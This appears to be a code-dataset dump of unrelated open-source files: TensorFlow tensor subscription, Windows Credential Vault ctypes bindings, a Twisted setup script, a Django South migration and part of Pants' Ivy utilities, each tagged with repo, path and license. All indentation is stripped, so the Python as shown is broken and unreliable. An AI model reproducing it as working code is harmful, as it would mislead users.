reuse the existing identity op, appending the given side effects to the list
of existing ones.
Args:
tensor: The `tf.Tensor` to be subscribed.
side_effects: List of side_effect functions, see subscribe for details.
control_cache: `_ControlOutputCache` helper to get control_outputs faster.
Returns:
The modified replacement to the passed in tensor which triggers the side
effects or the given tensor, if it was already been subscribed.
"""
# Check if the given tensor has a numpy compatible type (see dtypes.py).
# If not, we cannot subscribe it, so we just return the original tensor.
if not tensor.dtype.is_numpy_compatible:
logging.debug(('Tensor {} has an un-supported {} type and cannot be '
'subscribed.').format(tensor.name, tensor.dtype))
return tensor
if _is_subscribed_identity(tensor):
return _subscribe_extend(tensor, side_effects)
# Check if the given tensor has already been subscribed by inspecting its
# outputs.
name_scope = tensor.op.name + '/subscription/Identity'
consumers = tensor.consumers()
matching_ops = [op for op in consumers if op.name.startswith(name_scope)]
assert len(matching_ops) <= 1, ('Op {} must only have one subscription '
'op connected to it').format(tensor.op.name)
if len(matching_ops) == 1:
candidate_tensor = matching_ops[0].outputs[0]
if _is_subscribed_identity(candidate_tensor):
return _subscribe_extend(candidate_tensor, side_effects)
return _subscribe_new(tensor, side_effects, control_cache)
def subscribe(tensors, side_effects):
"""Subscribe to a tensor.
This method will attach side effect graphs to a given set
of tensors. Set of tensors follows from session.run and supports
single `Tensor`, `list`, nested `list`, `tuple`, `namedtuple`, or `dict`. It
returns the tensors in the same passed in structure, but as clones with
side effects applied. The supplied side effect graphs are specified
as a constructor function which takes the target tensor and
constructs a side effect graph and returns a list of ops that should
be control dependencies on fetching the tensor. It will append
'subscription' to the name scope of the tensor for every node in
the side effect graph. These control dependencies are what trigger
the side effects. Subscribe will construct the additions to your
graph and return the created identity tensor downstream of the control
dependencies. Use these tensors as you would normally in the rest of
your tensorflow code. If a given tensor has already been subscribed or a
tensor returned by a call to subscribe is passed, the previously created
identity tensor will be reused and the side effect graphs will be added to
the existing ones.
Args:
tensors: `Tensor` or set of tensors to subscribe to. Set of tensors format
follows from `Session.run` and supports single `Tensor`, `list`, nested
`list`, `tuple`, `namedtuple`, or `dict`.
side_effects: Function(s) that takes a `Tensor`, construct a subgraph, and
return a nonempty list of control dependencies. This can be a single
function or list of functions.
Returns:
Subscribed tensors, which are identity copies of the passed in tensors
in the same passed in structure, but the graph has been modified
such that these are downstream of the control dependencies for
the side effect graphs. Use these functionally equivelant tensors
instead of the passed in tensors for further construction or running.
"""
if not hasattr(side_effects, '__iter__'):
side_effects = [side_effects]
control_outputs = _ControlOutputCache()
result = _recursive_apply(
tensors, lambda t: _subscribe(t, side_effects, control_outputs))
return result
|
apache-2.0
|
gibxxi/nzbToMedia
|
libs/jaraco/windows/api/credential.py
|
4
|
1290
|
"""
Support for Credential Vault
"""
import ctypes
from ctypes.wintypes import DWORD, LPCWSTR, BOOL, LPWSTR, FILETIME
try:
from ctypes.wintypes import LPBYTE
except ImportError:
LPBYTE = ctypes.POINTER(ctypes.wintypes.BYTE)
class CredentialAttribute(ctypes.Structure):
_fields_ = []
class Credential(ctypes.Structure):
_fields_ = [
('flags', DWORD),
('type', DWORD),
('target_name', LPWSTR),
('comment', LPWSTR),
('last_written', FILETIME),
('credential_blob_size', DWORD),
('credential_blob', LPBYTE),
('persist', DWORD),
('attribute_count', DWORD),
('attributes', ctypes.POINTER(CredentialAttribute)),
('target_alias', LPWSTR),
('user_name', LPWSTR),
]
def __del__(self):
ctypes.windll.advapi32.CredFree(ctypes.byref(self))
PCREDENTIAL = ctypes.POINTER(Credential)
CredRead = ctypes.windll.advapi32.CredReadW
CredRead.argtypes = (
LPCWSTR, # TargetName
DWORD, # Type
DWORD, # Flags
ctypes.POINTER(PCREDENTIAL), # Credential
)
CredRead.restype = BOOL
CredWrite = ctypes.windll.advapi32.CredWriteW
CredWrite.argtypes = (
PCREDENTIAL, # Credential
DWORD, # Flags
)
CredWrite.restype = BOOL
CredDelete = ctypes.windll.advapi32.CredDeleteW
CredDelete.argtypes = (
LPCWSTR, # TargetName
DWORD, # Type
DWORD, # Flags
)
CredDelete.restype = BOOL
|
gpl-3.0
|
smartdata-x/robots
|
pylib/Twisted/twisted/words/topfiles/setup.py
|
22
|
1965
|
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
try:
from twisted.python import dist
except ImportError:
raise SystemExit("twisted.python.dist module not found. Make sure you "
"have installed the Twisted core package before "
"attempting to install any other Twisted projects.")
if __name__ == '__main__':
extraMeta = dict(
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: No Input/Output (Daemon)",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Topic :: Communications :: Chat",
"Topic :: Communications :: Chat :: AOL Instant Messenger",
"Topic :: Communications :: Chat :: ICQ",
"Topic :: Communications :: Chat :: Internet Relay Chat",
"Topic :: Internet",
"Topic :: Software Development :: Libraries :: Python Modules",
])
dist.setup(
twisted_subproject="words",
scripts=dist.getScripts("words"),
# metadata
name="Twisted Words",
description="Twisted Words contains Instant Messaging implementations.",
author="Twisted Matrix Laboratories",
author_email="[email protected]",
maintainer="Jp Calderone",
url="http://twistedmatrix.com/trac/wiki/TwistedWords",
license="MIT",
long_description="""\
Twisted Words contains implementations of many Instant Messaging protocols,
including IRC, Jabber, OSCAR (AIM & ICQ), and some functionality for creating
bots, inter-protocol gateways, and a client application for many of the
protocols.
In support of Jabber, Twisted Words also contains X-ish, a library for
processing XML with Twisted and Python, with support for a Pythonic DOM and
an XPath-like toolkit.
""",
**extraMeta)
|
apache-2.0
|
recsm/SQP
|
sqp/migrations/0062_adding_userprofile_activation_key.py
|
1
|
24092
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'UserProfile.activation_key'
db.add_column('sqp_userprofile', 'activation_key', self.gf('django.db.models.fields.CharField')(default='', max_length=40, blank=True), keep_default=False)
def backwards(self, orm):
# Deleting field 'UserProfile.activation_key'
db.delete_column('sqp_userprofile', 'activation_key')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sqp.branch': {
'Meta': {'ordering': "('label__characteristic__name', 'label__id')", 'object_name': 'Branch'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Label']"}),
'to_characteristic': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Characteristic']"})
},
'sqp.characteristic': {
'Meta': {'ordering': "['name']", 'object_name': 'Characteristic'},
'auto_fill_suggestion': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'desc': ('django.db.models.fields.TextField', [], {'db_column': "'description'", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'short_name': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'suggestion': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'validation_rules': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['sqp.ValidationRule']", 'null': 'True', 'blank': 'True'}),
'widget': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Widget']"})
},
'sqp.characteristicset': {
'Meta': {'ordering': "['id']", 'object_name': 'CharacteristicSet'},
'branches': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sqp.Branch']", 'symmetrical': 'False'}),
'coders': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'symmetrical': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sqp.coding': {
'Meta': {'ordering': "['user', 'characteristic']", 'object_name': 'Coding'},
'characteristic': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Characteristic']"}),
'choice': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Question']"}),
'seconds_taken': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'updated_on': ('django.db.models.fields.DateTimeField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'sqp.codingchange': {
'Meta': {'object_name': 'CodingChange'},
'change_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'change_by_user_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'change_type': ('django.db.models.fields.IntegerField', [], {}),
'characteristic': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Characteristic']"}),
'coding_change_group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.CodingChangeGroup']"}),
'coding_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'coding_user_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'error_occured': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new_value': ('django.db.models.fields.CharField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'}),
'new_value_by_related_country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Country']", 'null': 'True', 'blank': 'True'}),
'new_value_by_related_lang': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Language']", 'null': 'True', 'blank': 'True'}),
'processed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'processing_log': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'question_id': ('django.db.models.fields.IntegerField', [], {})
},
'sqp.codingchangegroup': {
'Meta': {'ordering': "['id']", 'object_name': 'CodingChangeGroup'},
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'sqp.codingsuggestion': {
'Meta': {'object_name': 'CodingSuggestion'},
'characteristic': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Characteristic']"}),
'explanation': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Question']"}),
'value': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
'sqp.completion': {
'Meta': {'object_name': 'Completion'},
'authorized': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'characteristic_set': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.CharacteristicSet']"}),
'complete': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'out_of_date': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'potential_improvements': ('sqp.fields.PickledObjectField', [], {'null': 'True', 'blank': 'True'}),
'predictions': ('sqp.fields.PickledObjectField', [], {'null': 'True', 'blank': 'True'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Question']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'sqp.country': {
'Meta': {'ordering': "['name']", 'object_name': 'Country'},
'iso': ('django.db.models.fields.CharField', [], {'max_length': '2', 'primary_key': 'True'}),
'iso_three': ('django.db.models.fields.CharField', [], {'max_length': '3', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'})
},
'sqp.faq': {
'Meta': {'object_name': 'FAQ'},
'answer': ('django.db.models.fields.TextField', [], {}),
'asker': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'question': ('django.db.models.fields.TextField', [], {})
},
'sqp.history': {
'Meta': {'object_name': 'History'},
'action_description': ('django.db.models.fields.TextField', [], {}),
'action_type': ('django.db.models.fields.IntegerField', [], {}),
'actor': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {}),
'object_model': ('django.db.models.fields.CharField', [], {'max_length': '90'}),
'object_name': ('django.db.models.fields.CharField', [], {'max_length': '170'}),
'previous_values': ('django.db.models.fields.TextField', [], {}),
'time': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'sqp.item': {
'Meta': {'ordering': "('study', 'admin_letter', 'admin_number', 'id')", 'object_name': 'Item'},
'admin': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '8'}),
'admin_letter': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'}),
'admin_number': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'created_item_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'long_name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '300'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'study': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Study']"})
},
'sqp.itemgroup': {
'Meta': {'object_name': 'ItemGroup'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'items': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sqp.Item']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'})
},
'sqp.label': {
'Meta': {'ordering': "('characteristic__name', 'id')", 'object_name': 'Label'},
'characteristic': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Characteristic']"}),
'code': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'compute': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "'True'", 'max_length': '150'})
},
'sqp.language': {
'Meta': {'ordering': "('name',)", 'object_name': 'Language'},
'coders': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'symmetrical': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'iso': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'iso2': ('django.db.models.fields.CharField', [], {'max_length': '2', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sqp.parameter': {
'Meta': {'ordering': "['order']", 'object_name': 'Parameter'},
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'views': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sqp.View']", 'through': "orm['sqp.Prediction']", 'symmetrical': 'False'})
},
'sqp.prediction': {
'Meta': {'object_name': 'Prediction'},
'function_name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '80', 'blank': 'True'}),
'paramater': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Parameter']"}),
'view': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.View']"})
},
'sqp.question': {
'Meta': {'ordering': "('item__study', 'country', 'language', 'item__admin_letter', 'item__admin_number', 'item__id')", 'object_name': 'Question'},
'answer_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Country']"}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'created_question_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'imported_from': ('django.db.models.fields.CharField', [], {'max_length': '120', 'null': 'True', 'blank': 'True'}),
'introduction_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'item': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Item']"}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Language']"}),
'rel': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'rel_hi': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'rel_lo': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'relz': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'relz_se': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'rfa_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'val': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'val_hi': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'val_lo': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'valz': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'valz_se': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'})
},
'sqp.questionbulkassignments': {
'Meta': {'object_name': 'QuestionBulkAssignments'},
'assignments': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sqp.UserQuestion']", 'symmetrical': 'False', 'blank': 'True'}),
'can_edit_details': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_edit_text': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Country']", 'null': 'True'}),
'has_been_run': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'item_group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.ItemGroup']", 'null': 'True'}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Language']", 'null': 'True'}),
'last_run_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'symmetrical': 'False'})
},
'sqp.questionbulkcreation': {
'Meta': {'object_name': 'QuestionBulkCreation'},
'copy_text_from_study': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Study']", 'null': 'True', 'blank': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Country']"}),
'created_questions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sqp.Question']", 'symmetrical': 'False', 'blank': 'True'}),
'has_been_run': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'item_group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.ItemGroup']"}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Language']"}),
'last_run_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'})
},
'sqp.study': {
'Meta': {'ordering': "('name',)", 'object_name': 'Study'},
'coders': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'symmetrical': 'False', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'created_study_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '70'})
},
'sqp.usedcountry': {
'Meta': {'ordering': "['name']", 'object_name': 'UsedCountry', 'db_table': "'vw_country_question'"},
'iso': ('django.db.models.fields.CharField', [], {'max_length': '2', 'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'})
},
'sqp.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'activation_key': ('django.db.models.fields.CharField', [], {'max_length': '40', 'blank': 'True'}),
'default_characteristic_set': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.CharacteristicSet']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_trusted': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'key_expires': ('django.db.models.fields.DateTimeField', [], {}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'profile'", 'unique': 'True', 'to': "orm['auth.User']"})
},
'sqp.userquestion': {
'Meta': {'object_name': 'UserQuestion'},
'can_edit_details': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_edit_text': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sqp.Question']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'sqp.validationrule': {
'Meta': {'object_name': 'ValidationRule'},
'failure_message': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
'rule': ('django.db.models.fields.TextField', [], {}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '7'})
},
'sqp.view': {
'Meta': {'ordering': "['order']", 'object_name': 'View'},
'expects': ('django.db.models.fields.CharField', [], {'default': "'tuple'", 'max_length': '20'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'template': ('django.db.models.fields.CharField', [], {'max_length': '140'})
},
'sqp.widget': {
'Meta': {'object_name': 'Widget'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['sqp']
|
mit
|
sid-kap/pants
|
src/python/pants/backend/jvm/ivy_utils.py
|
4
|
19614
|
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import errno
import logging
import os
import pkgutil
import threading
import xml.etree.ElementTree as ET
from collections import OrderedDict, defaultdict, namedtuple
from contextlib import contextmanager
from copy import deepcopy
from twitter.common.collections import OrderedSet, maybe_list
from pants.backend.jvm.targets.exclude import Exclude
from pants.backend.jvm.targets.jar_library import JarLibrary
from pants.base.build_environment import get_buildroot
from pants.base.exceptions import TaskError
from pants.base.generator import Generator, TemplateData
from pants.base.revision import Revision
from pants.base.target import Target
from pants.ivy.ivy_subsystem import IvySubsystem
from pants.util.dirutil import safe_mkdir, safe_open
IvyModule = namedtuple('IvyModule', ['ref', 'artifact', 'callers'])
logger = logging.getLogger(__name__)
class IvyModuleRef(object):
def __init__(self, org, name, rev, classifier=None):
self.org = org
self.name = name
self.rev = rev
self.classifier = classifier
def __eq__(self, other):
return self.org == other.org and \
self.name == other.name and \
self.rev == other.rev and \
self.classifier == other.classifier
def __hash__(self):
return hash((self.org, self.name, self.rev, self.classifier))
def __str__(self):
return 'IvyModuleRef({})'.format(':'.join([self.org, self.name, self.rev, self.classifier]))
@property
def unversioned(self):
"""This returns an identifier for an IvyModuleRef without version information.
It's useful because ivy might return information about a
different version of a dependency than the one we request, and we
want to ensure that all requesters of any version of that
dependency are able to learn about it.
"""
# latest.integration is ivy magic meaning "just get the latest version"
return IvyModuleRef(name=self.name, org=self.org, rev='latest.integration', classifier=self.classifier)
@property
def unclassified(self):
"""This returns an identifier for an IvyModuleRef without classifier information."""
return IvyModuleRef(name=self.name, org=self.org, rev=self.rev, classifier=None)
class IvyInfo(object):
def __init__(self):
self.modules_by_ref = {} # Map from ref to referenced module.
# Map from ref of caller to refs of modules required by that caller.
self._deps_by_caller = defaultdict(OrderedSet)
# Map from _unversioned_ ref to OrderedSet of IvyArtifact instances.
self._artifacts_by_ref = defaultdict(OrderedSet)
def add_module(self, module):
self.modules_by_ref[module.ref] = module
if not module.artifact:
# Module was evicted, so do not record information about it
return
for caller in module.callers:
self._deps_by_caller[caller.unversioned].add(module.ref)
self._artifacts_by_ref[module.ref.unversioned].add(module.artifact)
def traverse_dependency_graph(self, ref, collector, memo=None, visited=None):
"""Traverses module graph, starting with ref, collecting values for each ref into the sets
created by the collector function.
:param ref an IvyModuleRef to start traversing the ivy dependency graph
:param collector a function that takes a ref and returns a new set of values to collect for that ref,
which will also be updated with all the dependencies accumulated values
:param memo is a dict of ref -> set that memoizes the results of each node in the graph.
If provided, allows for retaining cache across calls.
:returns the accumulated set for ref
"""
if memo is None:
memo = dict()
memoized_value = memo.get(ref)
if memoized_value:
return memoized_value
visited = visited or set()
if ref in visited:
# Ivy allows for circular dependencies
# If we're here, that means we're resolving something that
# transitively depends on itself
return set()
visited.add(ref)
acc = collector(ref)
for dep in self._deps_by_caller.get(ref.unversioned, ()):
acc.update(self.traverse_dependency_graph(dep, collector, memo, visited))
memo[ref] = acc
return acc
def get_artifacts_for_jar_library(self, jar_library, memo=None):
"""Collects jars for the passed jar_library.
Because artifacts are only fetched for the "winning" version of a module, the artifacts
will not always represent the version originally declared by the library.
This method is transitive within the library's jar_dependencies, but will NOT
walk into its non-jar dependencies.
:param jar_library A JarLibrary to collect the transitive artifacts for.
:param memo see `traverse_dependency_graph`
:returns: all the artifacts for all of the jars in this library, including transitive deps
:rtype: list of str
"""
artifacts = OrderedSet()
def create_collection(dep):
return OrderedSet([dep])
for jar in jar_library.jar_dependencies:
for classifier in jar.artifact_classifiers:
jar_module_ref = IvyModuleRef(jar.org, jar.name, jar.rev, classifier)
for module_ref in self.traverse_dependency_graph(jar_module_ref, create_collection, memo):
artifacts.update(self._artifacts_by_ref[module_ref.unversioned])
return artifacts
def get_jars_for_ivy_module(self, jar, memo=None):
"""Collects dependency references of the passed jar
:param jar an JarDependency for a third party dependency.
:param memo see `traverse_dependency_graph`
"""
ref = IvyModuleRef(jar.org, jar.name, jar.rev, jar.classifier).unversioned
def create_collection(dep):
s = OrderedSet()
if ref != dep.unversioned:
s.add(dep)
return s
return self.traverse_dependency_graph(ref, create_collection, memo)
class IvyUtils(object):
"""Useful methods related to interaction with ivy."""
ivy_lock = threading.RLock()
IVY_TEMPLATE_PACKAGE_NAME = __name__
IVY_TEMPLATE_PATH = os.path.join('tasks', 'templates', 'ivy_resolve', 'ivy.mustache')
INTERNAL_ORG_NAME = 'internal'
class IvyResolveReportError(Exception):
"""Raised when the ivy report cannot be found."""
pass
@staticmethod
def _generate_exclude_template(exclude):
return TemplateData(org=exclude.org, name=exclude.name)
@staticmethod
def _generate_override_template(jar):
